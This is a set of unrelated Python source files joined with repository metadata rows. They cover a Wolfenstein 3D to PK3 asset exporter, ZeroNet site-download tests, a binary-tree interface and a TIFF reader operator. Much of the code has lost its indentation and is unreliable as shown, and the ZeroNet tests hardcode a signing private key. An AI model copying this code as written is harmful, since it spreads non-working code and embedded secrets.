logger = logging.getLogger()
logger.info('Exporting tile8')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
palette_map = cfg.GRAPHICS_PALETTE_MAP
start, count = partitions_map['tile8']
tile8_manager = pywolf.graphics.Tile8Manager(graphics_chunks_handler, palette_map, start, count)
for i, tile8 in enumerate(tile8_manager):
path = 'gfx/{}/tile8__{}.tga'.format(params.short_name, cfg.TILE8_NAMES[i])
logger.info('Tile8 [%d/%d]: %r', (i + 1), count, path)
top_bottom_rgb_image = tile8.image.transpose(Image.FLIP_TOP_BOTTOM).convert('RGB')
pixels_bgr = bytes(x for pixel in top_bottom_rgb_image.getdata() for x in reversed(pixel))
tile8_stream = io.BytesIO()
write_targa_bgrx(tile8_stream, tile8.dimensions, 24, pixels_bgr)
zip_file.writestr(path, tile8_stream.getbuffer())
logger.info('Done')
_sep()
def export_screens(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting DOS screens')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
start, count = partitions_map['screens']
screen_manager = pywolf.graphics.DOSScreenManager(graphics_chunks_handler, start, count)
for i, screen in enumerate(screen_manager):
path = 'texts/{}/screens/{}.scr'.format(params.short_name, cfg.SCREEN_NAMES[i])
logger.info('DOS Screen [%d/%d]: %r', (i + 1), count, path)
zip_file.writestr(path, screen.data)
logger.info('Done')
_sep()
def export_helparts(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting HelpArt texts')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
start, count = partitions_map['helpart']
helpart_manager = pywolf.graphics.TextArtManager(graphics_chunks_handler, start, count)
for i, helpart in enumerate(helpart_manager):
path = 'texts/{}/helpart/helpart_{}.txt'.format(params.short_name, i)
logger.info('HelpArt [%d/%d]: %r', (i + 1), count, path)
zip_file.writestr(path, helpart.encode('ascii'))
logger.info('Done')
_sep()
def export_endarts(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting EndArt texts')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
start, count = partitions_map['endart']
endart_manager = pywolf.graphics.TextArtManager(graphics_chunks_handler, start, count)
for i, endart in enumerate(endart_manager):
path = 'texts/{}/endart/endart_{}.txt'.format(params.short_name, i)
logger.info('EndArt [%d/%d]: %r', (i + 1), count, path)
zip_file.writestr(path, endart.encode('ascii'))
logger.info('Done')
_sep()
def export_sampled_sounds(params, cfg, zip_file, vswap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting sampled sounds')
start = vswap_chunks_handler.sounds_start
count = len(vswap_chunks_handler.sounds_infos)
sample_manager = pywolf.audio.SampledSoundManager(vswap_chunks_handler,
cfg.SAMPLED_SOUND_FREQUENCY,
start, count)
scale_factor = params.wave_rate / cfg.SAMPLED_SOUND_FREQUENCY
for i, sound in enumerate(sample_manager):
name = cfg.SAMPLED_SOUND_NAMES[i]
path = 'sound/{}/sampled/{}.wav'.format(params.short_name, name)
logger.info('Sampled sound [%d/%d]: %r', (i + 1), count, path)
samples = bytes(samples_upsample(sound.samples, scale_factor))
wave_file = io.BytesIO()
wave_write(wave_file, params.wave_rate, samples)
zip_file.writestr(path, wave_file.getbuffer())
logger.info('Done')
_sep()
def export_musics(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting musics')
start, count = cfg.AUDIO_PARTITIONS_MAP['music']
for i in range(count):
chunk_index = start + i
name = cfg.MUSIC_LABELS[i]
path = 'music/{}/{}.ogg'.format(params.short_name, name)
logger.info('Music [%d/%d]: %r', (i + 1), count, path)
imf_chunk = audio_chunks_handler[chunk_index]
wave_path = convert_imf_to_wave(imf_chunk, params.imf2wav_path,
wave_rate=params.ogg_rate, imf_rate=params.imf_rate)
        ogg_path = None
        try:
            ogg_path = convert_wave_to_ogg(wave_path, params.oggenc2_path)
            zip_file.write(ogg_path, path)
        finally:
            _force_unlink(wave_path, ogg_path)  # ogg_path is still None if the conversion failed
logger.info('Done')
_sep()
def export_adlib_sounds(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting AdLib sounds')
start, count = cfg.AUDIO_PARTITIONS_MAP['adlib']
adlib_manager = pywolf.audio.AdLibSoundManager(audio_chunks_handler, start, count)
for i, sound in enumerate(adlib_manager):
name = cfg.ADLIB_SOUND_NAMES[i]
path = 'sound/{}/adlib/{}.ogg'.format(params.short_name, name)
logger.info('AdLib sound [%d/%d]: %r', (i + 1), count, path)
imf_chunk = sound.to_imf_chunk()
wave_path = convert_imf_to_wave(imf_chunk, params.imf2wav_path,
wave_rate=params.ogg_rate, imf_rate=params.imf_rate)
        ogg_path = None
        try:
            ogg_path = convert_wave_to_ogg(wave_path, params.oggenc2_path)
            zip_file.write(ogg_path, path)
        finally:
            _force_unlink(wave_path, ogg_path)  # ogg_path is still None if the conversion failed
logger.info('Done')
_sep()
def export_buzzer_sounds(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting buzzer sounds')
start, count = cfg.AUDIO_PARTITIONS_MAP['buzzer']
buzzer_manager = pywolf.audio.BuzzerSoundManager(audio_chunks_handler, start, count)
for i, sound in enumerate(buzzer_manager):
name = cfg.BUZZER_SOUND_NAMES[i]
path = 'sound/{}/buzzer/{}.wav'.format(params.short_name, name)
logger.info('Buzzer sound [%d/%d]: %r', (i + 1), count, path)
wave_file = io.BytesIO()
sound.wave_write(wave_file, params.wave_rate)
zip_file.writestr(path, wave_file.getbuffer())
logger.info('Done')
_sep()
def export_tilemaps(params, cfg, zip_file, tilemap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting tilemaps (Q3Map2 *.map)')
start, count = 0, sum(episode[1] for episode in cfg.EPISODES)
    tilemap_manager = pywolf.game.TileMapManager(tilemap_chunks_handler, start, count)
i = 1
for episode_index, episode in enumerate(cfg.EPISODES):
for submap_index in range(episode[1]):
tilemap_index = episode[0] + submap_index
tilemap = tilemap_manager[tilemap_index]
name = '{}_e{}m{}'.format(params.short_name, episode_index + 1, submap_index + 1)
folder = os.path.join(params.output_folder, 'maps')
os.makedirs(folder, exist_ok=True)
path = os.path.join(folder, (name + '.map'))
logger.info('TileMap [%d/%d]: %r = %r', i, count, path, tilemap.name)
exporter = MapExporter(params, cfg, tilemap, episode_index, submap_index)
description = '\n'.join(exporter.describe_tilemap())
with open(path, 'wt') as map_file:
map_file.write(description)
path = 'maps/{}.map'.format(name)
zip_file.writestr(path, description)
i += 1
logger.info('Done')
_sep()
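# Example invocation (a sketch; the *.WL6 file names are illustrative, see
# build_argument_parser() for the full list of required arguments):
#
#   python export_ql_pk3.py --cfg cfg/wolf3d.py --input-folder data/wolf3d
#       --vswap-data VSWAP.WL6 --graphics-data VGAGRAPH.WL6
#       --graphics-header VGAHEAD.WL6 --graphics-huffman VGADICT.WL6
#       --audio-data AUDIOT.WL6 --audio-header AUDIOHED.WL6
#       --maps-data GAMEMAPS.WL6 --maps-header MAPHEAD.WL6
#       --output-pk3 wolf3d.pk3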
def main(*args):
logger = logging.getLogger()
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(logging.DEBUG)
logger.addHandler(stdout_handler)
logger.setLevel(logging.DEBUG)
parser = build_argument_parser()
params = parser.parse_args(args)
logger.info('Command-line parameters:')
for key, value in sorted(params.__dict__.items()):
logger.info('%s = %r', key, value)
_sep()
cfg = load_as_module('cfg', params.cfg)
vswap_data_path = os.path.join(params.input_folder, params.vswap_data)
logger.info('Precaching VSwap chunks: <data>=%r', vswap_data_path)
vswap_chunks_handler = pywolf.persistence.VSwapChunksHandler()
with open(vswap_data_path, 'rb') as data_file:
vswap_chunks_handler.load(data_file)
vswap_chunks_handler = pywolf.persistence.PrecachedChunksHandler(vswap_chunks_handler)
_sep()
audio_data_path = os.path.join(params.input_folder, params.audio_data)
audio_header_path = os.path.join(params.input_folder, params.audio_header)
logger.info('Precaching audio chunks: <data>=%r, <header>=%r', audio_data_path, audio_header_path)
audio_chunks_handler = pywolf.persistence.AudioChunksHandler()
    with open(audio_data_path, 'rb') as data_file, \
            open(audio_header_path, 'rb') as header_file:
audio_chunks_handler.load(data_file, header_file)
audio_chunks_handler = pywolf.persistence.PrecachedChunksHandler(audio_chunks_handler)
_sep()
graphics_data_path = os.path.join(params.input_folder, params.graphics_data)
graphics_header_path = os.path.join(params.input_folder, params.graphics_header)
graphics_huffman_path = os.path.join(params.input_folder, params.graphics_huffman)
logger.info('Precaching graphics chunks: <data>=%r, <header>=%r, <huffman>=%r',
graphics_data_path, graphics_header_path, graphics_huffman_path)
graphics_chunks_handler = pywolf.persistence.GraphicsChunksHandler()
    with open(graphics_data_path, 'rb') as data_file, \
            open(graphics_header_path, 'rb') as header_file, \
            open(graphics_huffman_path, 'rb') as huffman_file:
graphics_chunks_handler.load(data_file, header_file, huffman_file, cfg.GRAPHICS_PARTITIONS_MAP)
graphics_chunks_handler = pywolf.persistence.PrecachedChunksHandler(graphics_chunks_handler)
_sep()
maps_data_path = os.path.join(params.input_folder, params.maps_data)
maps_header_path = os.path.join(params.input_folder, params.maps_header)
logger.info('Precaching map chunks: <data>=%r, <header>=%r', maps_data_path, maps_header_path)
tilemap_chunks_handler = pywolf.persistence.MapChunksHandler()
    with open(maps_data_path, 'rb') as data_file, \
            open(maps_header_path, 'rb') as header_file:
tilemap_chunks_handler.load(data_file, header_file)
tilemap_chunks_handler = pywolf.persistence.PrecachedChunksHandler(tilemap_chunks_handler)
_sep()
pk3_path = os.path.join(params.output_folder, params.output_pk3)
logger.info('Creating PK3 (ZIP/deflated) file: %r', pk3_path)
with zipfile.ZipFile(pk3_path, 'w', zipfile.ZIP_DEFLATED) as pk3_file:
_sep()
export_tilemaps(params, cfg, pk3_file, tilemap_chunks_handler)
export_shaders(params, cfg, pk3_file)
export_textures(params, cfg, pk3_file, vswap_chunks_handler)
export_sprites(params, cfg, pk3_file, vswap_chunks_handler)
export_pictures(params, cfg, pk3_file, graphics_chunks_handler)
export_tile8(params, cfg, pk3_file, graphics_chunks_handler)
export_screens(params, cfg, pk3_file, graphics_chunks_handler)
export_helparts(params, cfg, pk3_file, graphics_chunks_handler)
export_endarts(params, cfg, pk3_file, graphics_chunks_handler)
export_sampled_sounds(params, cfg, pk3_file, vswap_chunks_handler)
export_adlib_sounds(params, cfg, pk3_file, audio_chunks_handler)
export_buzzer_sounds(params, cfg, pk3_file, audio_chunks_handler)
export_musics(params, cfg, pk3_file, audio_chunks_handler)
logger.info('PK3 archived successfully')
if __name__ == '__main__':
main(*sys.argv[1:])
| gpl-3.0 | 7,717,207,670,447,818,000 | 39.547742 | 116 | 0.571163 | false |
frerepoulet/ZeroNet | src/Test/TestSiteDownload.py | 1 | 15361 | import time
import pytest
import mock
import gevent
from Connection import ConnectionServer
from Config import config
from File import FileRequest
from File import FileServer
from Site import Site
import Spy
@pytest.mark.usefixtures("resetTempSettings")
@pytest.mark.usefixtures("resetSettings")
class TestSiteDownload:
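    """Integration tests for site download between an in-process source
    FileServer and a client connection: full download order and priorities,
    removal of archived user content, and optional file retrieval, both
    from a connected peer and via peer discovery when the connected peer
    lacks the file."""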
def testDownload(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
assert site.storage.directory == config.data_dir + "/" + site.address
assert site_temp.storage.directory == config.data_dir + "-temp/" + site.address
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = ConnectionServer("127.0.0.1", 1545)
site_temp.connection_server = client
site_temp.announce = mock.MagicMock(return_value=True) # Don't try to find peers from the net
site_temp.addPeer("127.0.0.1", 1544)
with Spy.Spy(FileRequest, "route") as requests:
def boostRequest(inner_path):
                # I really want these files
if inner_path == "index.html":
site_temp.needFile("data/img/multiuser.png", priority=5, blocking=False)
site_temp.needFile("data/img/direct_domains.png", priority=5, blocking=False)
site_temp.onFileDone.append(boostRequest)
site_temp.download(blind_includes=True).join(timeout=5)
file_requests = [request[2]["inner_path"] for request in requests if request[0] in ("getFile", "streamFile")]
# Test priority
assert file_requests[0:2] == ["content.json", "index.html"] # Must-have files
assert file_requests[2:4] == ["css/all.css", "js/all.js"] # Important assets
assert file_requests[4] == "dbschema.json" # Database map
assert file_requests[5:7] == ["data/img/multiuser.png", "data/img/direct_domains.png"] # Directly requested files
assert "-default" in file_requests[-1] # Put default files for cloning to the end
# Check files
bad_files = site_temp.storage.verifyFiles(quick_check=True)
# -1 because data/users/1J6... user has invalid cert
assert len(site_temp.content_manager.contents) == len(site.content_manager.contents) - 1
assert not bad_files
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
def testArchivedDownload(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = FileServer("127.0.0.1", 1545)
client.sites[site_temp.address] = site_temp
site_temp.connection_server = client
# Download normally
site_temp.addPeer("127.0.0.1", 1544)
site_temp.download(blind_includes=True).join(timeout=5)
bad_files = site_temp.storage.verifyFiles(quick_check=True)
assert not bad_files
assert "data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json" in site_temp.content_manager.contents
assert site_temp.storage.isFile("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json")
assert len(list(site_temp.storage.query("SELECT * FROM comment"))) == 2
# Add archived data
assert not "archived" in site.content_manager.contents["data/users/content.json"]["user_contents"]
assert not site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", time.time()-1)
site.content_manager.contents["data/users/content.json"]["user_contents"]["archived"] = {"1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q": time.time()}
site.content_manager.sign("data/users/content.json", privatekey="5KUh3PvNm5HUWoCfSUfcYvfQ2g3PrRNJWr6Q9eqdBGu23mtMntv")
date_archived = site.content_manager.contents["data/users/content.json"]["user_contents"]["archived"]["1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q"]
assert site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", date_archived-1)
assert site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", date_archived)
assert not site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", date_archived+1) # Allow user to update archived data later
# Push archived update
assert not "archived" in site_temp.content_manager.contents["data/users/content.json"]["user_contents"]
site.publish()
site_temp.download(blind_includes=True).join(timeout=5) # Wait for download
# The archived content should disappear from remote client
assert "archived" in site_temp.content_manager.contents["data/users/content.json"]["user_contents"]
assert "data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json" not in site_temp.content_manager.contents
assert not site_temp.storage.isDir("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q")
assert len(list(site_temp.storage.query("SELECT * FROM comment"))) == 1
assert len(list(site_temp.storage.query("SELECT * FROM json WHERE directory LIKE '%1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q%'"))) == 0
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
# Test when connected peer has the optional file
def testOptionalDownload(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = ConnectionServer("127.0.0.1", 1545)
site_temp.connection_server = client
site_temp.announce = mock.MagicMock(return_value=True) # Don't try to find peers from the net
site_temp.addPeer("127.0.0.1", 1544)
# Download site
site_temp.download(blind_includes=True).join(timeout=5)
# Download optional data/optional.txt
site.storage.verifyFiles(quick_check=True) # Find what optional files we have
optional_file_info = site_temp.content_manager.getFileInfo("data/optional.txt")
assert site.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert not site_temp.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert not site_temp.storage.isFile("data/optional.txt")
assert site.storage.isFile("data/optional.txt")
site_temp.needFile("data/optional.txt")
assert site_temp.storage.isFile("data/optional.txt")
# Optional user file
assert not site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
optional_file_info = site_temp.content_manager.getFileInfo(
"data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif"
)
assert site.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert not site_temp.content_manager.hashfield.hasHash(optional_file_info["sha512"])
site_temp.needFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert site_temp.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
# Test when the connected peer does not have the file, so ask it whether it knows someone who has it
def testFindOptional(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init full source server (has optional files)
site_full = Site("1TeSTvb4w2PWE81S2rEELgmX2GCCExQGT")
file_server_full = FileServer("127.0.0.1", 1546)
site_full.connection_server = file_server_full
gevent.spawn(lambda: ConnectionServer.start(file_server_full))
time.sleep(0.001) # Port opening
file_server_full.sites[site_full.address] = site_full # Add site
site_full.storage.verifyFiles(quick_check=True) # Check optional files
site_full_peer = site.addPeer("127.0.0.1", 1546) # Add it to source server
hashfield = site_full_peer.updateHashfield() # Update hashfield
assert len(site_full.content_manager.hashfield) == 8
assert hashfield
assert site_full.storage.isFile("data/optional.txt")
assert site_full.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert len(site_full_peer.hashfield) == 8
# Remove hashes from source server
for hash in list(site.content_manager.hashfield):
site.content_manager.hashfield.remove(hash)
# Init client server
site_temp.connection_server = ConnectionServer("127.0.0.1", 1545)
site_temp.addPeer("127.0.0.1", 1544) # Add source server
# Download normal files
site_temp.log.info("Start Downloading site")
site_temp.download(blind_includes=True).join(timeout=5)
# Download optional data/optional.txt
optional_file_info = site_temp.content_manager.getFileInfo("data/optional.txt")
optional_file_info2 = site_temp.content_manager.getFileInfo("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert not site_temp.storage.isFile("data/optional.txt")
assert not site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert not site.content_manager.hashfield.hasHash(optional_file_info["sha512"]) # Source server doesn't know it has the file
assert not site.content_manager.hashfield.hasHash(optional_file_info2["sha512"]) # Source server doesn't know it has the file
assert site_full_peer.hashfield.hasHash(optional_file_info["sha512"]) # The full peer added to the source server has the file
assert site_full_peer.hashfield.hasHash(optional_file_info2["sha512"]) # The full peer added to the source server has the file
assert site_full.content_manager.hashfield.hasHash(optional_file_info["sha512"]) # The full server knows it has the file
assert site_full.content_manager.hashfield.hasHash(optional_file_info2["sha512"]) # The full server knows it has the file
site_temp.log.info("Request optional files")
with Spy.Spy(FileRequest, "route") as requests:
# Request 2 files at the same time
threads = []
threads.append(site_temp.needFile("data/optional.txt", blocking=False))
threads.append(site_temp.needFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif", blocking=False))
gevent.joinall(threads)
assert len([request for request in requests if request[0] == "findHashIds"]) == 1 # findHashids should call only once
assert site_temp.storage.isFile("data/optional.txt")
assert site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert site_temp.storage.deleteFiles()
file_server_full.stop()
[connection.close() for connection in file_server.connections]
def testUpdate(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
assert site.storage.directory == config.data_dir + "/" + site.address
assert site_temp.storage.directory == config.data_dir + "-temp/" + site.address
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = FileServer("127.0.0.1", 1545)
client.sites[site_temp.address] = site_temp
site_temp.connection_server = client
# Don't try to find peers from the net
site.announce = mock.MagicMock(return_value=True)
site_temp.announce = mock.MagicMock(return_value=True)
# Connect peers
site_temp.addPeer("127.0.0.1", 1544)
# Download site from site to site_temp
site_temp.download(blind_includes=True).join(timeout=5)
# Update file
data_original = site.storage.open("data/data.json").read()
data_new = data_original.replace('"ZeroBlog"', '"UpdatedZeroBlog"')
assert data_original != data_new
site.storage.open("data/data.json", "wb").write(data_new)
assert site.storage.open("data/data.json").read() == data_new
assert site_temp.storage.open("data/data.json").read() == data_original
site.log.info("Publish new data.json without patch")
# Publish without patch
with Spy.Spy(FileRequest, "route") as requests:
site.content_manager.sign("content.json", privatekey="5KUh3PvNm5HUWoCfSUfcYvfQ2g3PrRNJWr6Q9eqdBGu23mtMntv")
site.publish()
time.sleep(0.1)
site_temp.download(blind_includes=True).join(timeout=5)
assert len([request for request in requests if request[0] in ("getFile", "streamFile")]) == 1
assert site_temp.storage.open("data/data.json").read() == data_new
# Close connection to avoid update spam limit
site.peers.values()[0].remove()
site.addPeer("127.0.0.1", 1545)
site_temp.peers.values()[0].ping() # Connect back
time.sleep(0.1)
# Update with patch
data_new = data_original.replace('"ZeroBlog"', '"PatchedZeroBlog"')
assert data_original != data_new
site.storage.open("data/data.json-new", "wb").write(data_new)
assert site.storage.open("data/data.json-new").read() == data_new
assert site_temp.storage.open("data/data.json").read() != data_new
# Generate diff
diffs = site.content_manager.getDiffs("content.json")
assert not site.storage.isFile("data/data.json-new") # New data file removed
assert site.storage.open("data/data.json").read() == data_new # -new postfix removed
assert "data/data.json" in diffs
assert diffs["data/data.json"] == [('=', 2), ('-', 29), ('+', ['\t"title": "PatchedZeroBlog",\n']), ('=', 31102)]
# Publish with patch
site.log.info("Publish new data.json with patch")
with Spy.Spy(FileRequest, "route") as requests:
site.content_manager.sign("content.json", privatekey="5KUh3PvNm5HUWoCfSUfcYvfQ2g3PrRNJWr6Q9eqdBGu23mtMntv")
site.publish(diffs=diffs)
site_temp.download(blind_includes=True).join(timeout=5)
assert len([request for request in requests if request[0] in ("getFile", "streamFile")]) == 0
assert site_temp.storage.open("data/data.json").read() == data_new
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
| gpl-2.0 | -2,810,019,909,871,408,600 | 50.720539 | 173 | 0.679643 | false |
UB-info/estructura-datos | RafaelArqueroGimeno_S6/ABBInterface.py | 1 | 1812 | import copy
from itertools import cycle, islice
from model import *
import view
import parserLastFM
__author__ = "Rafael Arquero Gimeno"
def add(users, parser):
"""
:type users: ABB
:param parser: File parser
:return: A Binary Search Tree containing old + parsed values
"""
for user in islice(parser, 5000):
users.insert(user)
return users
def search(source, minimum=0.0, maximum=1.0):
"""Returns an iterator that returns values inside the interval in the given tree
:rtype : generator
:param source: Original Tree
:param minimum: lower bound
:param maximum: higher bound
"""
assert minimum <= maximum
# the tree is passed by reference; work on a copy so the caller's tree is not modified
result = copy.copy(source)
result.deleteLower(minimum).deleteHigher(maximum)
return cycle(result) if result else None
def remove(source, minimum=0.0, maximum=1.0):
"""Returns a tree with with the values of given source if they are out of given interval
:type source: ABB
"""
assert minimum <= maximum
lowers, highers = copy.copy(source), copy.copy(source)
lowers.deleteHigher(minimum)
highers.deleteLower(maximum)
root = highers.min # the lowest of highers, can be the root
highers.delete(root, wholeNode=True)
result = ABB().insert(root)
result.root.left = lowers.root
result.root.right = highers.root
return result
def useful_info(tree):
"""Returns a string with useful info about the given ABB
:type tree: ABB
"""
return "Depth: " + str(tree.depth)
def emptyType():
return ABB()
if __name__ == "__main__":
parser = parserLastFM.parser("LastFM_small.dat")
app = view.MainApp(parser, add, search, remove, useful_info, emptyType())
app.mainloop()
| mit | -3,641,968,380,993,265,000 | 23.16 | 92 | 0.674393 | false |
stuarteberg/lazyflow | lazyflow/operators/ioOperators/opTiffReader.py | 1 | 7430 | import numpy
# Note: tifffile can also be imported from skimage.external.tifffile.tifffile_local,
# but we can't use that module because it is based on a version of tifffile that has a bug.
# (It doesn't properly import the tifffile.c extension module.)
#import skimage.external.tifffile.tifffile_local as tifffile
import tifffile
import _tifffile
if tifffile.decodelzw != _tifffile.decodelzw:
import warnings
warnings.warn("tifffile C-extension is not working, probably due to a bug in tifffile._replace_by().\n"
"TIFF decompression will be VERY SLOW.")
import vigra
from lazyflow.graph import Operator, InputSlot, OutputSlot
from lazyflow.roi import roiToSlice
from lazyflow.request import RequestLock
import logging
logger = logging.getLogger(__name__)
class OpTiffReader(Operator):
"""
Reads TIFF files as an ND array. We use two different libraries:
- To read the image metadata (determine axis order), we use tifffile.py (by Christoph Gohlke)
- To actually read the data, we use vigra (which supports more compression types, e.g. JPEG)
Note: This operator intentionally ignores any colormap
information and uses only the raw stored pixel values.
(In fact, avoiding the colormapping is not trivial using the tifffile implementation.)
TODO: Add an option to output color-mapped pixels.
"""
Filepath = InputSlot()
Output = OutputSlot()
TIFF_EXTS = ['.tif', '.tiff']
def __init__(self, *args, **kwargs):
super( OpTiffReader, self ).__init__( *args, **kwargs )
self._filepath = None
self._page_shape = None
def setupOutputs(self):
self._filepath = self.Filepath.value
with tifffile.TiffFile(self._filepath) as tiff_file:
series = tiff_file.series[0]
if len(tiff_file.series) > 1:
raise RuntimeError("Don't know how to read TIFF files with more than one image series.\n"
"(Your image has {} series".format( len(tiff_file.series) ))
axes = series.axes
shape = series.shape
pages = series.pages
first_page = pages[0]
dtype_code = first_page.dtype
if first_page.is_palette:
# For now, we don't support colormaps.
# Drop the (last) channel axis
# (Yes, there can be more than one :-/)
last_C_pos = axes.rfind('C')
assert axes[last_C_pos] == 'C'
axes = axes[:last_C_pos] + axes[last_C_pos+1:]
shape = shape[:last_C_pos] + shape[last_C_pos+1:]
# first_page.dtype refers to the type AFTER colormapping.
# We want the original type.
key = (first_page.sample_format, first_page.bits_per_sample)
dtype_code = self._dtype = tifffile.TIFF_SAMPLE_DTYPES.get(key, None)
# From the tifffile.TiffPage code:
# -----
# The internal, normalized '_shape' attribute is 6 dimensional:
#
# 0. number planes (stk)
# 1. planar samples_per_pixel
# 2. image_depth Z (sgi)
# 3. image_length Y
# 4. image_width X
# 5. contig samples_per_pixel
(N, P, D, Y, X, S) = first_page._shape
assert N == 1, "Don't know how to handle any number of planes except 1 (per page)"
assert P == 1, "Don't know how to handle any number of planar samples per pixel except 1 (per page)"
assert D == 1, "Don't know how to handle any image depth except 1"
if S == 1:
self._page_shape = (Y,X)
self._page_axes = 'yx'
else:
assert shape[-3:] == (Y,X,S)
self._page_shape = (Y,X,S)
self._page_axes = 'yxc'
assert 'C' not in axes, \
"If channels are in separate pages, then each page can't have multiple channels itself.\n"\
"(Don't know how to weave multi-channel pages together.)"
self._non_page_shape = shape[:-len(self._page_shape)]
assert shape == self._non_page_shape + self._page_shape
assert self._non_page_shape or len(pages) == 1
axes = axes.lower().replace('s', 'c')
if 'i' in axes:
for k in 'tzc':
if k not in axes:
axes = axes.replace('i', k)
break
if 'i' in axes:
raise RuntimeError("Image has an 'I' axis, and I don't know what it represents. "
"(Separate T,Z,C axes already exist.)")
self.Output.meta.shape = shape
self.Output.meta.axistags = vigra.defaultAxistags( axes )
self.Output.meta.dtype = numpy.dtype(dtype_code).type
self.Output.meta.ideal_blockshape = ((1,) * len(self._non_page_shape)) + self._page_shape
def execute(self, slot, subindex, roi, result):
"""
Use vigra (not tifffile) to read the result.
This allows us to support JPEG-compressed TIFFs.
"""
num_page_axes = len(self._page_shape)
roi = numpy.array( [roi.start, roi.stop] )
page_index_roi = roi[:, :-num_page_axes]
roi_within_page = roi[:, -num_page_axes:]
logger.debug("Roi: {}".format(map(tuple, roi)))
# Read each page out individually
page_index_roi_shape = page_index_roi[1] - page_index_roi[0]
for roi_page_ndindex in numpy.ndindex(*page_index_roi_shape):
if self._non_page_shape:
tiff_page_ndindex = roi_page_ndindex + page_index_roi[0]
tiff_page_list_index = numpy.ravel_multi_index(tiff_page_ndindex, self._non_page_shape)
logger.debug( "Reading page: {} = {}".format( tuple(tiff_page_ndindex), tiff_page_list_index ) )
page_data = vigra.impex.readImage(self._filepath, dtype='NATIVE', index=int(tiff_page_list_index), order='C')
else:
# Only a single page
page_data = vigra.impex.readImage(self._filepath, dtype='NATIVE', index=0, order='C')
page_data = page_data.withAxes(self._page_axes)
assert page_data.shape == self._page_shape, \
"Unexpected page shape: {} vs {}".format( page_data.shape, self._page_shape )
result[ roi_page_ndindex ] = page_data[roiToSlice(*roi_within_page)]
def propagateDirty(self, slot, subindex, roi):
if slot == self.Filepath:
self.Output.setDirty( slice(None) )
if __name__ == "__main__":
from lazyflow.graph import Graph
graph = Graph()
opReader = OpTiffReader(graph=graph)
opReader.Filepath.setValue('/groups/flyem/home/bergs/Downloads/Tiff_t4_HOM3_10frames_4slices_28sec.tif')
print opReader.Output.meta.axistags
print opReader.Output.meta.shape
print opReader.Output.meta.dtype
print opReader.Output[2:3,2:3,2:3,10:20,20:50].wait().shape
# opReader.Filepath.setValue('/magnetic/data/synapse_small.tiff')
# print opReader.Output.meta.axistags
# print opReader.Output.meta.shape
# print opReader.Output.meta.dtype
| lgpl-3.0 | 642,158,149,604,213,600 | 42.964497 | 125 | 0.577793 | false |
sharadagarwal/autorest | AutoRest/Generators/Python/Azure.Python.Tests/Expected/AcceptanceTests/StorageManagementClient/storagemanagementclient/models/check_name_availability_result.py | 1 | 1683 | # coding=utf-8
# --------------------------------------------------------------------------
